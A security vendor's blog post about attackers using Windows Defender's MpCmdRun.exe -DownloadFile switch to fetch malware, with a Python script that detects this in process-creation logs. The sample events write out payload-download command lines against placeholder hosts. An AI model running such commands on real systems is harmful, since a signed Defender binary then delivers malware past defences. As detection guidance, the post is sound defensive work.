Antivirus is the last thing you would expect to be turned against you, yet that is exactly what can happen when a trusted security tool gains a capability attackers can borrow.
Ironically, a recent update to Windows Defender Antivirus put it on the list of legitimate, signed programs that cybercriminals abuse (so-called "living off the land" binaries). The update gave Defender's command-line utility the ability to download a file from an arbitrary URL to a Windows computer, and an attacker who already has a foothold can use that feature to fetch malware with a Microsoft-signed binary instead of their own tooling.
You might also be surprised to learn that every Windows 10 installation ships with Windows Defender, regardless of whether you have installed another antivirus solution on top of it.
Even when Windows Defender has been disabled in favour of a third-party product, its executables remain on disk. Because one of those executables can download files from the internet on request, the download feature is available to anyone who can run a command on the machine, which means it can be used to pull malware onto the system.
If you are running ThreatLocker Application Whitelisting, it does not matter whether the file arrived via Windows Defender or by any other route: ThreatLocker blocks any file that is not trusted from executing.
A better outcome is to stop the file from being downloaded in the first place. With ThreatLocker you can Ringfence any application, including antivirus software such as Windows Defender, and deny it network access it does not need.
We always recommend that you Ringfence as many applications as possible and restrict them from accessing the internet unless they genuinely need to.
For your convenience, ThreatLocker provides an out-of-the-box suggested policy that Ringfences Windows Defender, and we have added it to the default configuration for all new customers and user groups.
With these policies in place, any file, malicious or not, can neither be downloaded nor executed unless it has been explicitly permitted.
Antivirus is often excluded from monitoring by other security tools on the assumption that it is trustworthy. Security professionals must recognise that any application, including antivirus, can have exploitable features or vulnerabilities. It is therefore critical that you do not exclude software such as Windows Defender from being monitored for malicious behaviour, for example a Defender process being used to download a file.
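The point above, that the antivirus itself must stay in scope for monitoring, can be turned into a concrete check. The following script is an added example written for this post and is not ThreatLocker code. It runs over a constructed set of process-creation events (the field names follow the Sysmon Event ID 1 layout: Image, CommandLine, ParentImage) and flags any process that invokes Defender's download switch. It assumes the documented MpCmdRun.exe syntax `-DownloadFile -url <url> -path <path>`; the URLs, hostnames, file paths and the platform version folder in the sample data are all made up for the demonstration. Detection keys on the switch rather than on the binary name, so a copy of MpCmdRun.exe that has been renamed or moved is still caught.

```python
"""Flag use of Windows Defender's -DownloadFile switch in process-creation logs.

Added example for this post; not part of ThreatLocker or Microsoft tooling.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Constructed sample events in Sysmon Event ID 1 style. All paths, URLs and the
# platform version folder are invented for this example.
SAMPLE_EVENTS = [
    {   # benign: Defender updating its own signatures
        "Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
        "CommandLine": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -SignatureUpdate',
        "ParentImage": r"C:\Windows\System32\svchost.exe",
    },
    {   # abuse: the real Defender binary told to fetch a payload from a shell
        "Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.0000.0-0\MpCmdRun.exe",
        "CommandLine": r"MpCmdRun.exe -DownloadFile -url http://203.0.113.10/payload.exe -path C:\Users\Public\payload.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # abuse: a renamed copy of the binary, switch given in lower case
        "Image": r"C:\Users\Public\mp.exe",
        "CommandLine": r'mp.exe -downloadfile -url "https://example.com/a.bin" -path "C:\Temp\a.bin"',
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    },
    {   # unrelated process, must not be flagged
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": r"notepad.exe C:\notes.txt",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]

# The switch is matched case-insensitively as a standalone token, so "-DownloadFile"
# buried in a path or another word does not trigger.
DOWNLOAD_SWITCH = re.compile(r"(?<![\w-])-downloadfile(?![\w-])", re.IGNORECASE)
URL_ARG = re.compile(r'-url\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)
PATH_ARG = re.compile(r'-path\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)

# Parents that indicate a human or script drove the download, rather than Defender's
# own service. Any -DownloadFile use is reportable; these raise the confidence.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass
class Finding:
    image: str
    parent: str
    url: Optional[str]
    dest: Optional[str]
    renamed: bool          # binary is not called MpCmdRun.exe
    scripted_parent: bool  # launched from a shell or script host


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _argument(pattern: re.Pattern, cmdline: str) -> Optional[str]:
    """Return the value of a -url / -path argument, quoted or bare."""
    match = pattern.search(cmdline)
    if not match:
        return None
    return match.group(1) or match.group(2)


def inspect_event(event: dict) -> Optional[Finding]:
    """Return a Finding if the event is a Defender file download, else None."""
    cmdline = event.get("CommandLine", "")
    if not DOWNLOAD_SWITCH.search(cmdline):
        return None
    image = event.get("Image", "")
    parent = event.get("ParentImage", "")
    return Finding(
        image=image,
        parent=parent,
        url=_argument(URL_ARG, cmdline),
        dest=_argument(PATH_ARG, cmdline),
        renamed=_basename(image) != "mpcmdrun.exe",
        scripted_parent=_basename(parent) in SCRIPT_HOSTS,
    )


def scan(events: Iterable[dict]) -> List[Finding]:
    """Run inspect_event over a stream of events and keep the hits."""
    return [f for f in (inspect_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        tag = "RENAMED " if finding.renamed else ""
        print(f"{tag}{finding.image} <- {finding.parent}: {finding.url} -> {finding.dest}")
```

Feeding this the sample data reports the second and third events and ignores the signature update and notepad. In production you would point it at your real process-creation telemetry and treat any hit as an incident to investigate, since there is no routine reason for an operator to use Defender as a download tool.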
Ultimately, the way to protect yourself from abuse of legitimate features like this one is to limit access. Do not allow applications to reach the internet unless they need to, and do not assume that a trusted vendor's software can never be misused.
By taking a zero-trust approach you reduce your attack surface, and in turn your exposure to vulnerabilities and to abuse of the tools you already have installed.